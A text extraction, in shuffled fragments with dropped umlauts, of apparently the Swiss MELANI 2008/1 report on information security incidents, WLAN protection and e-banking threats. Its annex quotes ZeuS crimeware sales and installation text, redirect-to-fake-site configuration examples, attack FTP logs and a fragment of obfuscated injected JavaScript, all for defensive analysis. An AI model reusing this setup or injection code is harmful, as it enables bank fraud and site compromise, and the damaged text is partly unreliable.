nen Partei der Schweiz gruene ch kompromittiert und mit einer Drive By Infektion versehen Nach Bekanntwerden wurden die Seiten durch die Provider tempor r gesperrt Wie viele Computernutzer sich tats chlich infiziert haben ist auch hier unklar Laut Angaben des Providers war in mindestens einem Fall eine Sicherheitsl cke in einer PHP Anwendung Schuld daran dass die Seiten manipuliert werden konnten Webseitenbetreiber tun gut daran ihre Applikationen regelm ssig
44. ds verk rpern Das Internet stellt eine ffentliche B hne dar und erm glicht es mit relativ einfachen Mitteln weltweit Aufmerksamkeit zu erlan gen Zudem spielen das Internet und die Informationstechnologien in den modernen Staaten eine immer wichtigere Rolle was zu zahlreichen Angriffsfl chen f hrt Akteure eines politi schen Konfliktes oder einer Auseinandersetzung jeglicher Art k nnen das Internet und die Informationstechnologie gleichermassen sowohl als Mittel wie auch als Zielscheibe nutzen Zu diesem Zweck bedienen sich die politisch motivierten Hacker vielf ltigen illegalen oder zumindest zweifelhaften Mitteln H ufige zum Einsatz kommen Webseiten Defacements das Verunstalten von Webseiten sowie DDoS Attacken der Angriff auf Server mit dem Ziel ei ner oder mehrerer seiner Dienste zu beeintr chtigen Weitere genutzte Mittel sind Redirects Informationsdiebstahl Webseiten Parodien virtuelle Sitzblockaden Sabotage und speziell entwickelte Software Hacktivismus existiert bereits seit den sp ten 90er Jahren Die politisch motivierten DDoS Attacken gegen Estland im Jahr 2007 welche im Zusammenhang mit einem Streit um die Verschiebung eines sowjetischen Kriegerdenkmals in der estnischen Hauptstadt Tallinn er folgt sind haben dieses Ph nomen jedoch auf die politische Agenda vieler Staaten gesetzt Es wird in diesem Fall davon ausgegangen dass die T ter im Umfeld russischer Nationalis ten zu suchen sind Die breite Thema
45. e eben falls anl sslich der Attacken gegen Estland offensichtlich EU Verl ngerung der Europ ischen Agentur f r Netzwerk und Informationssicherheit ENISA Im Juni 2008 hat die EU Kommission entschieden die Laufzeit der 2004 gegr ndeten Euro p ischen Agentur f r Netzwerk und Informationssicherheit ENISA um weitere drei Jahre zu verl ngern Die ENISA dient den EU Mitgliedstaaten und Organen als Anlauf und Bera tungsstelle in Fragen der Netz und Informationssicherheit Zuvor hatte die EU Kommission nach Reformen der ENISA verlangt da diese unzureichend ausgestattet sei um k nftigen Herausforderungen erfolgreich zu begegnen Mit diesem Ent scheid wurden jedoch keine Reformen beschlossen ber das Fortbestehen nach dem Jahr 2012 soll zu einem sp teren Zeitpunkt entschieden werden 7 2 Privat Verbesserte Sicherheitsmechanismen beim E Banking Wie bereits im Halbjahresbericht 2007 2 erw hnt sind etliche Finanzinstitute daran ihre Si cherheitsmechanismen im Bereich E Banking zu verst rken Um eine betr gerische ber weisung zu erkennen helfen verbesserte interne Filtersysteme Zudem werden zurzeit bei einigen Finanzinstituten neue Authentifizierungsmethoden eingef hrt Seit April 2008 f hren die ZKB sowie die Raiffeisenbanken so genannte mobile Transaktionsnummern m TAN ein Der Kunde erh lt hierbei vor der endg ltigen berweisung eine SMS zur Pr fung Damit kann er noch einmal einen Kontrollblick auf W hrun
46. eitenden des Herstellers die Basisstation zur Fehlerbehebung anders einstellen k nnen Wenn Sie diese Fehrnkonfigura tion nicht brauchen schalten Sie diese unbedingt aus nderung der Netzwerkkennung ndern Sie die standardm ssig vergebene Netzwerkkennung SSID 19 Siehe Gerichtsurteil Oberlandgericht Frankfurt http medien internet und recht de volltext php mir dok id 1671 Stand 11 08 2008 20 http www admin ch ch d sr 220 a41 html Stand 11 08 2008 22 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Aussendung der Netzwerkkennung unterdr cken Verhindern Sie dass der WLAN Access Point regelmassig seine Netzwerkkennung SSID aussendet Dazu mussen Sie die Option Broadcast SSID auf Nein setzen Beschr nkung des Zugriffs auf Ihre Endger te Schr nken Sie den Zugriff auf Ihren Access Point so ein dass lediglich Ihre Endger te mit ihm kommunizieren d rfen Dies kann durch Erfassen der MAC Adresse der Endger te er reicht werden Verschl sselung einschalten Aktivieren Sie an Ihrer WLAN Hardware die WPA oder WPA2 Verschl sselung und w hlen Sie daf r ein starkes schwer zu erratendes Passwort Bei WPA2 PSK sollte dies mindestens 20 Zeichen umfassen Wechseln Sie regelm ig die zur Verschl sselung verwendeten Schl ssel Unterst tzt Ihre WLAN Hardware noch kein WPA oder WPA2 aktivieren Sie die WEP Verschl sselung Der WEP Schl s
47. emeint sind hiermit Dinge die viele Spyware Autoren lieben die Auslagerung von Firewalls und Antiviren Software die Verhinderung von Updates dieser Programme die Sperrung von Ctrl Alt Del usw 8 Blockierung der Windows Firewall diese Funktion ist nur f r die ungehinderte Annahme eingehen der Verbindungen erforderlich Der Bot weist Gemeinsamkeiten mit vielen hnlichen Softwareprogrammen auf wie bei spielsweise der M glichkeit Firewalls oder Antivirenprogramme zu deaktivieren Updates zu verhindern Taskmanager zu blockieren und vieles Andere mehr 9 Der Bot speichert empfangt sendet alle seine Einstellungen Logs Anweisungen in verschl sselter Form via HTTP S Protokoll d h nur Sie werden die Daten im Textformat sehen alles brige Bot lt gt Server wird wie M ll aussehen 10 NAT Detection mittels Pr fung der eigenen IP ber eine von Ihnen angegebene Webseite 36 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 11 Gesonderte Konfigurationsdatei schutzt vor dem Verlust des Botnets falls der Hauptserver nicht verf gbar ist Dar ber hinaus zus tzliche Reserve Konfigurationsdateien auf die der Bot zugreift falls die Haupt Konfigurationsdatei nicht verf gbar ist Dieses System garantiert das berleben Ih res Botnets in 90 aller F lle Interessant ist auch das Verteidigungssystem welches beim Ausfall der zentralen Steue rungs Server C amp C den U
48. en Erinnert sei hier an den Phishing Trick ber Dom nen mit Umlauten 33 https nic switch ch reg ocView action res EF6GW2JBPVTG67DLNIQWQ337PUQWO2TAEBSH27Q Stand 11 08 2008 http www melani admin ch dienstleistungen archiv 00478 index html lang de Stand 11 08 2008 28 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 8 Gesetzliche Grundlagen Bundesrat lehnt neue Gesetzgebung zur Bekampfung der Netzwerkkriminalitat ab Ende Februar 2008 hat der Bundesrat eine neue Gesetzgebung zur Bekampfung der Netz werkkriminalit t abgelehnt Gem ss Bundesrat gen gt das geltende Recht um erfolgreich Delikte zu ahnden die mittels elektronischen Kommunikationsnetzen wie Internet oder Mobil telefonnetze begangen werden Eine neue ausdr ckliche Regelung der strafrechtlichen Ver antwortlichkeit der Provider wird aus diesem Grund abgelehnt Hingegen hat der Bundesrat die Annahme zweier Motionen beantragt welche den Ausbau der Internet berwachung und die Ratifikation der Cybercrime Konvention vorsehen Einerseits sollen Ressourcen aufge stockt werden um die berwachung und Auswertung dschihadistischer und gewaltextremis tischer Internetseiten auszubauen Anderseits unterst tzt der Bundesrat die Ratifikation der Europaratskonvention ber die Cyber Kriminalit t Die schweizerische Rechtsordnung ent spricht den Anforderungen dieser Konvention bereits weitgehend Zurzei
49. en Online Server der Webseite w rde es nur kurze Zeit dauern bis ein anderer Server seine Aufgabe bernehmen w rde Kurz gesagt wenn ein Dokument auf wikileaks erst einmal ver ffentlicht ist kann es folglich kaum mehr entfernt werden 5 Aktuelle Lage IKT Infrastruktur international 5 1 Pannen Besch digte Internet Seekabel f hren zu Beeintr chtigung des Internets Anfang 2008 kam es innert weniger Tage zur Besch digung von mehreren Internet Seekabeln im Mittelmeer sowie im persischen Golf Dies f hrte zu einer teilweise bedeuten den Beeintr chtigung des Internets zwischen Europa dem nahen Osten und dem indischen Subkontinent Solche Vorkommnisse verlangen nach Antworten bez glich der Verletzbarkeit und Redundanz des Internets Zuerst rissen zwei Seekabel im Mittelmeer welche Europa ber gypten und L nder des nahen Ostens bis nach Indien verbinden Somit war eine Stelle betroffen welche die einzige Route f r den Internet Verkehr ganzer Weltregionen darstellt Diese Besch digungen waren verantwortlich f r den Wegfall von rund 70 der Netz Kapazit t in gypten und f r die Be eintr chtigung von rund 50 des Datenverkehrs von Indien Richtung Westen Wenige Tage sp ter kam es zu Ausf llen von zwei weiteren Seekabeln im persischen Golf Die Auswir MELANI Halbjahresbericht 20091 18 52 Informationssicherung Lage in der Schweiz und international kungen waren unter anderem deshalb geringer da es Alter
50. en Strafverfolgungsbeh rden auf Da dies in den meisten F llen einen verl sslicher Anhaltspunkt darstellt ist vielfach eine Hausdurchsuchung die Folge Obschon der vermeintlich Angeschuldigte nichts zu bef rch ten haben d rfte kann dies unter Umst nden bei der Nachbarschaft unliebsame Ger chte ausl sen und einen grossen Schrecken zur ck lassen F r die Betreiber von privaten Funknetzwerken gilt es folgende Punkte zu beachten Schutz der Administrationsseite Die meisten WLAN Access Points verf gen zur Administration ber eine Benutzeroberfl che die mit einem Browser zug nglich ist http IP_ADRESSE_DES_ACCESS_POINTS Mit dieser Oberfl che k nnen auch die nachfolgend beschriebenen Einstellungen ausgef hrt werden Der Zugang zu dieser Administrationsseite ist mit einem Standardpasswort ge sch tzt das umgehend ge ndert werden sollte Funkverbindung ber Access Point Die direkte Funkverbindung zwischen zwei Computern Ad hoc Modus ist immer relativ un sicher Besser ist die Nutzung eines zentralen Zugriffspunkts Access Point ber den alle Ger te verbunden werden Dabei sollte der Access Point so eingestellt werden dass ber Funk nur die Verbindung ins Internet nicht aber die Verbindung ins interne Netzwerk gestat tet wird Fernkonfiguration abschalten F r manche Basisstationen ist es m glich ihre Einstellungen von aussen ber das Internet zu ver ndern Diese Funktion ist daf r gedacht dass die Mitarb
51. er Lade Algorithmus des URL Redirects IRN Suche der vom Opfer geladenen URL in der Konfigurationsdatei Pr fung der Schalter berpr fung auf bereinstimmungen mit der Blackmask berpr fung auf bereinstimmungen mit der Whitemask Aufruf der neuen URL Verwendung des Schalters S Dieser Schalter wird meist f r die bergabe der Steuerung an die Scamsite verwendet Durch das Setzen des Schalters muss die neue URL die Grund URL f r die Scamsite sein der Bot f gt am Ende der neuen URL einen Teil des Pfads aus der realen URL an beginnend nach dem Letzten Slash Zeichen der berein stimmenden urspr nglichen URL Beispiele entry webfakes end http rambler ru http yandex ru GP Welche Seite das Opfer auf rambler ru auch zu ffnen versucht es wird immer die Hauptseite von yandex ru geladen http mail rambler ru script auth cgi http mydomain myrambler asp P amp mailtan Beispiel eines Ubergangs Fakes der das Feld mailtan beinhaltet Die Fakesite wird geladen bei POST Anfragen in denen mailtan nicht vorkomt deshalb wird nach der Verarbeitung des Fakes das Opfer normal auf seine E mails gelangen http mail rambler ru script auth cgi http mydomain myrambler asp P amp mailtan login Beispiel eines bergangs Fakes der das Feld mailtan beinhaltet Die Fakesite wird geladen bei POST Anfragen in denen mailtan nicht vorkommt in de
52. er Hand Bei ungewollt erhaltenen E Mails reagieren die Benutzer mittlerweile skeptisch Wenn aber eine Vielzahl von Webseiten gehackt wird ist die Wahrscheinlichkeit gross dass sich darunter Seiten mit einem guten Ruf sowie einer hohen Besucheranzahl befinden Zudem versuchen die Hacker gezielt Webseiten mit hohen Besucherzahlen an zugreifen Nur noch bekannte oder vertrauensw rdige Webseiten anzusurfen bietet somit keinen Schutz mehr Viele Hersteller von Antivirenprodukten versuchen der Bedrohung von Drive By Infektionen entgegenzuwirken indem sie in ihre Produkte zus tzliche Schutzma nahmen implementieren Die Benutzung von JavaScript respektive ActiveX einzuschr nken kann ebenfalls helfen ungewollte Drive By Downloads zu verhindern 2 3 Politisch motiviertes Hacking F r die allgemeine Internet Kriminalit t stellt die finanzielle Bereicherung weiterhin die wich tigste Motivation dar Daneben r cken jedoch andere Motive in den Vordergrund und werden zunehmend ffentlich diskutiert Ein solches ist das politische Motiv der so genannte Hack tivismus Der Begriff Hacktivismus verbindet Hacking mit politischem bzw sozialem Ak tivismus und wird hier kurz auch politisch motiviertes Hacking genannt Hacktivismus ist kein neues Ph nomen hat in letzter Zeit jedoch an Bedeutung gewonnen Hacktivismus kann auf nationalistischen Beweggr nden basieren oder eine Art ffentlicher Protest eine Form des zivilen Widerstan
53. erichtet die Neugier oder die Angst des Empf ngers zu wecken Die Texte variierten in der Sprachqualit t waren jedoch mehr heitlich in schlechtem Deutsch verfasst Ein markantes Zeichen war das Fehlen von Umlau ten Auch inhaltlich wiesen die E Mails Fehler auf So befindet sich in Genf beispielsweise kein Schweizer Kernkraftwerk Im Allgemeinen muss davon ausgegangen werden dass die Aktualit t einer Meldung ihre thematische Anpassung an die Empf nger sowie ihre sprachliche Qualit t Faktoren sind welche den Empf nger davon berzeugen k nnen auf einen Link zu klicken bzw einen Anhang zu ffnen In Zukunft muss vermehrt mit gezielten Spam Wellen gerechnet werden MELANI warnt in ihrem Newsletter regelm ssig und ausf hrlich vor diesen Spamwellen Ge nerell wird empfohlen bei E Mails mit unbekanntem Absender Vorsicht walten zu lassen ffnen Sie in solch einem Fall keine angef gten Dokumente oder Programme und klicken 4 http www melani admin ch dienstleistungen newsletter 00128 index html lang de Stand 11 08 2008 MELANI Halbjahresbericht 20091 14 52 Informationssicherung Lage in der Schweiz und international Sie auf keine darin angegebenen Links Wird hingegen ein Anhang ge ffnet oder ein Link angeklickt dann empfiehlt MELANI den Gang zu einer Computerfachperson um die Ma schine neu zu installieren Zus tzlich wird empfohlen s mtliche Passw rter E Mail Konto Tauschb rsen Login Date
54. et sich den Verk ufer f r jede Erneuerung von ZeuS zu bezahlen die nicht mit Fehlern in dessen Funktionsweise in Zusammenhang steht ebenso f r die Erg nzung um jede zus tzliche Funktionalit t Wird gegen diese Vereinbarung verstossen und dieser Verstoss entdeckt gehen Sie jedweder technischen Un terst tzung verlustig Dar ber hinaus wird der Bot Ihrer Zusammenstellung unverz glich den Antiviren Software Herstellern zugesandt Der Vertrag imitiert Lizenzbedingungen handels blicher Software obwohl dieses Programm f r den Verkauf im Schwarzmarkt bestimmt ist Wie kann man sich gegen die Weitergabe des Programms zur Wehr setzen vor allem in einer Umgebung in der die normalen Regeln nichts gelten Die Entwickler haben den Weg der Sanktionen gew hlt Ein Verstoss gegen die Vereinbarung hat Konsequenzen zur Folge Verweigerung des technischen Supports oder Meldung des Bots an die Hersteller von Antivirensoftware Die Tatsache dass die Soft ware schliesslich trotzdem zum freien Download auf dem Internet erschien beweist aber dass diese Massnahmen nicht die erhoffte Abschreckung hatten Beschreibung des Produkts ZeuS ist eine Spionage Software Spyware im weiteren Bot f r 32bit MS Windows 2000 XP dient zur Steue rung der Rechner von Opfern und zum Erhalt von Information von diesen mit Hilfe von Logs ZeuS besteht aus drei Teilen 1 einem Steuerungspanel das auf dem den Server n installiert wird 2 dem Builder eine
55. fiziell bestatigt Auberdem tegen die Orisbewohner Fotos in seinen Blogs hinaus auf denen Explostonsfolgen und Korper der Beschadigten dargesteit sind LiveJournal Blog hip Away Am 27 Marz 2008 wurde eine unbekannte Anzahl E Mails mit dem Betreff Eine Bankenkri se der Schweizer Banken ist unvermeidlich verschickt Nach dem Anklicken des Links wel cher in dieser E Mail enthalten war wurde der Empfanger dazu aufgefordert ein Plugin zu installieren Auch in diesem Fall war das Ziel die Installation einer Malware Diese Spam Welle ist insofern besonders bemerkenswert als dass sich ihr Inhalt auf eine zum damaligen Zeitpunkt aktuelle und viel diskutierte Thematik bezog namlich auf die Ereignisse rund um die Hypothekenkrise Die spater folgenden E Mails variierten inhaltlich und im Betreff Die E Mails jungeren Da tums enthielten Anh nge mit ausf hrbaren Dateien Diese waren meist komprimiert zip rar um deren Endung zu verschleiern F r eine vollst ndige Auflistung der Spam Wellen sei auf den MELANI Newsletter verwiesen MELANI hat im ersten Halbjahr 2008 diverse E Mail Wellen beobachtet welche auf E Banking Applikationen ausgerichtet waren Zeitweise konnten diese Wellen im Wochentakt beobachtet werden Es war immer die gleiche Art von Malware im Spiel Diese wurde aber jeweils so modifiziert dass sie zu Beginn nicht oder nur von wenigen Antiviren Programmen erkannt wurde Die E Mails waren inhaltlich darauf ausg
56. g Betrag und Kontonummer des Emp f ngers werfen ehe die Zahlung endg ltig get tigt wird Die Kosten bernimmt die Online bank Zur Erh hung der Sicherheit f hrt die Migros Bank seit Juli 2008 eine ganzheitliche USB Stick L sung ein Hierbei wird s mtlichen E Banking Kunden ein kostenloser USB Stick sowie eine Chipkarte mit PIN Code zur Verf gung gestellt Der USB Stick enth lt einen ge h rteten Webbrowser der eigens f r die Migros Bank konzipierte worden ist Nur noch die ser Browser kann auf die E Banking Applikation zugreifen Der Browser der sich auf dem Computer des Kunden befindet und m glicherweise durch eine Schadsoftware kompromit tiert worden ist wird nicht mehr ben tigt Viele der Finanzinstitute setzen auf interne Filter und Controllingmechanismen um betr ge rische Transaktionen zu erkennen Zus tzlich werden aber auch die Authentifizierungs methoden den aktuellen Bedingungen angepasst Mit deren Einf hrung d rfte sich die Prob lematik von E Banking Malware in den n chsten Monaten teilweise entsch rfen http www enisa europa eu pages 02 01 press 2008 06 13 extension html Stand 24 07 2008 27 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international WLAN in 1 Klasswagen der SBB Die SBB hat Businessabteile von 75 Wagen der 1 Klasse durch die Swisscom mit WLAN ausr sten lassen Nach mehrfachem Anlauf die ersten Versuche gehen auf das
57. g Center der UEFA Ein Stromausfall im Internationalen Broadcasting Center der UEFA in Wien hat zu einer Un terbrechung der TV bertragung des Halbfinalspiels Deutschland T rkei von ungef hr acht Minuten gef hrt Zum Zeitpunkt des Stromausfalls tobte ber der Stadt Wien ein heftiges Gewitter welches f r den Stromausfall verantwortlich war Ein Softwarefehler verhinderte ein l ckenloses Umschalten auf die Notstromaggregate was gewisse Computer zum Absturz brachte Die Bildausf lle hatten TV Stationen aller L nder ausser dem Schweizer Fernsehen und Al Jazeera betroffen Die EURO 2008 verlief aus Sicht der Informationssicherung sehr ruhig Es wurde vor allem mit Aktivit ten von Cyber Kriminellen gerechnet welche die EURO als Trittbrett f r ihre kri minellen Machenschaften missbrauchen w rden Einige solcher Angriffe wurden zwar ver zeichnet insgesamt war das Meldeaufkommen bei MELANI jedoch vergleichbar mit anderen Monaten Insbesondere gilt es zu betonen dass keine DDoS Angriffe gegen Webseiten kriti scher Informationsinfrastrukturen respektive EURO 2008 Webseiten registriert worden sind Zeitweilige Sperrung von wikileaks org Wikileaks ist ein Ende 2006 anonym ins Leben gerufenes Projekt das f r die massenweise und nicht auf den Absender zur ckzuf hrende Ver ffentlichung von geheimen Informationen und Analysen dienen soll Prim r sollen Personen insbesondere Regimekritiker angespro chen werden welche ihr
58. g von Webseiten verwendet werden Der Computer von dem aus die Webseite administriert wird wird hierbei mit einem Trojaner infiziert der dann die 44 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Zugangsdaten stiehlt Der Angreifer verwendet danach die gestohlenen Passw rter um sich einzuloggen und den Code der Webseiten mit den b sartigen Funktionen zu erg nzen Sol che Manipulationen erfolgen entweder manuell durch den Angreifer oder automatisiert durch einen Bot Folgender Auszug Abbildung 1 von FTP Logdateien illustriert einen solchen Angriff Die Analyse zeigt dass nicht nur ein sondern gleich drei Uploads b sartiger Teile erfolgte und zwar am 4 M rz 2008 20 M rz 2008 und 28 April 2008 Die IP Adressen waren in diesem Fall in Kanada und den USA registriert Es handelte sich hierbei h chstwahrscheinlich um eine automatisierte Attacke Die IP Adressen verweisen lediglich auf einen Proxy oder Bot net Rechner und nicht auf die Angreifer selber 2008 03 04 11 49 42 68 148 9 86 xyz 21 24236 USER xyz 331 000 2008 03 04 11 49 42 68 148 9 86 xyz 21 24236 PASS 230 0 0 15 2008 03 04 11 49 53 68 148 9 86 xyz 21 24236 sent xyz index html 426 0 0 110 2008 03 04 11 49 53 68 148 9 86 xyz 21 24236 sent xyz index html 226 588 0 1031 2008 03 04 11 50 20 68 148 9 86 xyz 21 24236 sent xyz Main_Frame htm 426 0 0 125 2008 03 04 11 50 20 68 148 9 86 xyz 21 24236 sent
59. glaubt die Dom nen zu kontrollieren aber das stimmt nicht Wir kontrollieren die Dom nen inklusive die der ICANN ber die genaue Vorgehensweise der Hacker liegen keine Angaben vor Der Fall scheint jedoch zu belegen dass solch ein Angriff jeden treffen kann Solche F lle weisen darauf hin wie wichtig es ist dass die Internet Hosting Provider ihre Systeme immer auf dem neusten Stand halten Eine Herausforderung liegt darin dass auf einem Hostingserver die Webauftritte mehrerer Kunden gleichzeitig laufen Wird nun bei spielsweise die Webseite eines Kunden ber eine Schwachstelle in einer seiner Webapplika tionen angegriffen besteht die M glichkeit dass auch Webseiten anderer Kunden davon betroffen sind Umgekehrt sind bei einem Angriff auf den Webserver selbst s mtliche darauf gespeicherten Webseiten betroffen 20 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 6 Pravention 6 1 Schwerpunkt Funknetzwerke Private Funknetzwerke Funknetzwerke WLANs sind heute auch privat weit verbreitet Bei vielen Internetangeboten ist ein WLAN Router bereits inklusive Zudem verschiebt sich der Trend immer deutlicher weg vom Desktop Computer und hin zu tragbaren Ger ten welche standardm ssig mit einer Funknetzkarte ausgestattet sind Auch das iPhone wird der Funknetztechnik weiteren Schwung verleihen Auf der anderen Seite wuchs auch das Bewusstsein der Benutzer be
60. hbare Form gebracht werden Deobfuskation Wahrend diese Methode der Obfuskation auch von JavaScript Programmierern verwendet wird um ihr geistiges Eigentum zu schut zen wird sie in diesem Beispiel eindeutig dazu verwendet um Administratoren und Ermittler davon abzuhalten die volle Funktionsfahigkeit des Codes verstehen zu k nnen In Abbildung 2 ist der urspr ngliche HTML Code gr n markiert der hinzugef gte Code rot Dieser besteht aus einem sehr langen JavaScript String Zur besseren Darstellungen wurden in Abbildung 1 Zeilenumbr che eingef gt Dieser String wird in der letzten Zeile unescaped entkomprimiert die Resultate der document write Methode gesendet und somit dem Webbrowser zur Ausf hrung weitergeleitet Im Klartext ist nur folgender Code ersichtlich eval unescape document write MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Bei Webseiten mit nur wenigen oder gar keinen JavaScripten genugen solche Code Fragmente als Warnsignal Im Falle von komplexeren Webseiten fallen diese jedoch unter Umstanden nicht mehr auf Da der gesamte JavaScript Code in einer einzigen langen Zeile enthalten ist wird er von den Webmastern oft erst erkannt nachdem ein Besucher eine In fektion meldet lt script language javascript gt 63a 3d 22 2566u 256ectiax 256fn 2564c 2573 25645 e 2573 d 2573 253 du 256 ee 2573c 25ae6 1p 2
61. heitsl cke Schwachstelle in Hard oder Software ber die Angreifer Zugriff auf ein System erlangen k nnen Social Engineering Social Engineering Angriffe nutzen die Hilfsbereitschaft Gutgl u bigkeit oder die Unsicherheit von Personen aus um an vertrauliche Daten zu gelangen oder die Opfer zu bestimmten Handlungen zu bewegen Spam Unaufgefordert und meistens automatisiert zugesandte Massen werbung Spam Emails Als Spammer bezeichnet man den Ab sender dieser Mitteilungen w hrend das Versenden selbst als Spamming bezeichnet wird SQL Datenbank Datenbank auf Basis der Datenbanksprache Structured Query Language SQL SQL ist relativ einfach aufgebaut und semantisch an die englische Umgangssprache angelehnt SQL stellt eine Rei he von Befehlen zur Manipulation von Datenbest nden Einf gen Bearbeiten und L schen von Datens tzen und zur Abfrage von Daten zur Verf gung SQL Injection SQL Injection SQL Einschleusung bezeichnet das Ausnutzen einer Sicherheitsl cke in Zusammenhang mit SQL Datenbanken die durch mangelnde berpr fung von zu bermittelnden Variab len entsteht Der Angreifer versucht dabei eigene Datenbankbefeh le einzuschleusen um Daten in seinem Sinne zu ver ndern oder Kontrolle ber den Server zu erhalten SYN Flood Ein SYN Flood ist eine Form von DDoS Attacken auf Computer systeme Der Angriff verwendet den Verbindungsaufbau des TCP Transportprotokolls um einzelne Die
62. ichtung eines Zentrums f r Computerverteidigung in Estland 26 EU Verl ngerung der Europ ischen Agentur f r Netzwerk und Informationssicherheit EN ISA a tee aeg 27 LE EE E EE 27 Verbesserte Sicherheitsmechanismen beim E Banking nn 27 WLAN in 1 Klasswagen der SBB c ccceecceeesseeeeeeceeeeeeeeeseeseneneeeeeeenennenensees 28 ICANN Schaffung neuer Top Level Domaine 28 MELANI Halbjahresbericht 20091 2 52 Informationssicherung Lage in der Schweiz und international 8 Gesetzliche Grundlagen oii nian id en 29 Bundesrat lehnt neue Gesetzgebung zur Bekampfung der Netzwerkkriminalitat LE 29 AS Je EE 30 105 Anha NO WEE 35 10 1 Professionalisierung der Internetkriminalitat am Beispiel ZeuS eee 35 10 2 Drive by Infektionen Was sie sind und wie sie funktionieren nn 44 3 52 MELANI Halbjahresbericht 2008 1 Informationssicherung Lage in der Schweiz und international Schwerpunkte Ausgabe 2008 1 e Von der IT Sicherheit zur Informationssicherung Aktuelle gezielte IT Angriffe lassen sich auch mit Hilfe technischer Sicherheitsvorkeh rungen sowie einer gesunden Portion Menschenverstand nicht immer erfolgreich ab wehren Deshalb ist eine Neufokussierung notig welche den Schutz der Information ins Zentrum r ckt und nicht nur den Schutz der Computer und Netzwerke ber cksich tigt gt Aktuelle Lage Kapitel 2 1 gt Vorf lle Schweiz Kapitel 4 und Vorf lle in
63. inzuschleusen variieren Meist handelt es sich um das Ausnutzen von Schwachstellen in PHP Anwendungen wobei h ufig Sicher heitsl cken in Foren ausgenutzt werden Eine weitere M glichkeit ist das Verwenden von SQL Injections In beiden Fallen werden die Webseiten jeweils automatisch auf g ngige Si cherheitsl cken getestet Webseitenbetreiber tun also gut daran ihre eigenen Applikationen regelm ssig auf Sicherheitsrisiken zu berpr fen und sie gegebenenfalls anzupassen Auch werden FTP Zugangsdaten zu Webseiten im grossen Stil gesammelt Dies kann beispiels 1 Siehe z B http www heise de newsticker Massenhacks von Webseiten werden zur Plage meldung 105053 Stand 11 08 2008 sowie http www heise de newsticker Erneuter Massenhack von Webseiten meldung 107786 Stand 11 08 2008 und http www heise de security Wieder gross angelegte Angriffe auf Web Anwender im Gange Update news meldung 101521 Stand 11 08 2008 Siehe f r weiterf hrende weitere Informationen http www heise de security Grundsicherung fuer PHP Software artikel 96564 Stand 11 08 2008 7 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international weise durch eine Schadsoftware Keylogger geschehen welche auf dem Computer instal liert ist auf dem die Webseite administriert wird Der Vorteil f r die Kriminellen Schadcode mit Hilfe von gehackten Webseiten zu verbreiten liegt auf d
64. iren Software Die Fertigstellung dieser Funktion in n chster Zeit wird jedoch gew hrleistet DF Installation des Bots Im darauf folgenden Kapitel wird die Installation des Steuerpanels auf einem Server be schrieben Wie aus den nachstehenden Ausf hrungen ersichtlich ist dienen dabei g ngige PHP basierende Content Management Systeme wie Wordpress Typo3 oder Textpattern als Vorbild Es reicht auf den Verzeichnissen entsprechende Schreibberechtigungen zu setzen chmod 777 und die Installation via index php zu starten Danach folgt eine Reihe von Pa rametrisierungen wie Passwort Serveradressen und anderes 1 Der Server sollte mindestens folgende Software vorinstalliert haben Apache beliebige Version PHP ab Version 4 oder h her MySQL ab Version 4 oder h her Gew hnlich sind diese Programme bereits auf dem Server installiert andernfalls wenden Sie sich an den Supportservice des Servers Kopieren Sie den Inhalt des Ordners web aus Ihrem Softwarepaket in ein beliebiges optimalerweise neues Verzeichnis Ihrer Wahl auf den Server auf das Sie Zugriff via HTTP Protokoll haben Falls der Server auf einem nix System Linux FreeBSD etc l uft setzen Sie auf dem Verzeichnis sys tem die Rechte 0777 chmod Rufen Sie via HTTP das Script install index php auf z B http bot net zeus install index php daraufhin sollte das Installationsscript starten Falls dies nicht geschieht ist m glicherweise der Server nicht kor
65. ispielsweise E Mails mit gef lschten Absenderadressen zustellen PHP PHP ist eine Skriptsprache die haupts chlich zur Erstellung von dynamischen Webseiten oder Webanwendungen verwendet wird Plugin Eine Zusatzsoftware welche die Grundfunktionen einer Anwen dung erweitert Beispiel Acrobat Plugins f r Internet Browser er lauben die direkte Anzeige von PDF Dateien Proxy Bot Ein System welches Browser Anfragen entgegennimmt und wei terleitet Im Fall eines Proxy Bots bernimmt diese Aufgabe ein Botnetzwerk Dies dient vor allem zur Anonymisierung der Identi t t da als IP Adresse jeweils der Bot und nicht derjenige auftaucht welcher die Browser Anfrage tats chlich gemacht hat rar rar ist ein Algorithmus und Dateiformat zur Datenkompression um den Speicherbedarf von Dateien f r die Archivierung und Ubertra gung zu verringern Router Ger te aus dem Bereich Computernetzwerke Telekommunikation oder auch Internet die mehrere Rechnernetze koppeln oder tren nen Router werden beispielsweise in Heimnetzwerken eingesetzt und machen die Verbindung zwischen internem Netz und dem Int ranet Schadsoftware Siehe Malware MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Server Computersystem welches Clients bestimmte Ressourcen wie z B Speicherplatz Dienste z B E Mail Web FTP usw oder Daten anbietet Sicher
66. it vorgestellt Einige der geplanten Ver nderungen betreffen auch den Bereich der Internet Kriminalit t So will sich Frankreich vor dem Hintergrund der aktuellen Bedrohungslage gegen allf llige Cyber Attacken besser r sten Einerseits soll die Verteidi gung von Netzwerk und Informationssystemen ausgebaut und neu koordiniert werden Dies soll im Rahmen einer neuen Einheit der so genannten agence de la s curit des systemes d information erreicht werden Anderseits will Frankreich aber auch in offensive F higkeiten investieren Weiters unterstreicht das Weisspapier die Notwendigkeit die Kooperation auf europ ischer Ebene im Bereich der Abwehr von Attacken auf Informationssysteme zu ver st rken Frankreich betont in seinem Weisspapier dass der Cyberraum zu einem neuen Aktionsfeld von milit rischen Operationen geworden sei was eine Aufr stung in diesem Bereich auch f r 25 F r den Gesetzesentwurf siehe http www bmi bund de Internet Content Common Anlagen Gesetze Entwurf__BKAG templateld raw property p ublicationFile pdf Entwurf BKAG pdf und f r weitere Informationen vom Bundministerium des Innern http www bmi bund de nn 165104 Internet Content Themen Terrorismus DatenundFakten Online Durchsuchungen html Stand 29 07 2008 26 F r mehr Informationen zur Debatte siehe http www heise de newsticker Bundesregierung beharrt auf heimlichen Online Durchsuchungen meldung 108955 sowie http www heise de newsticker 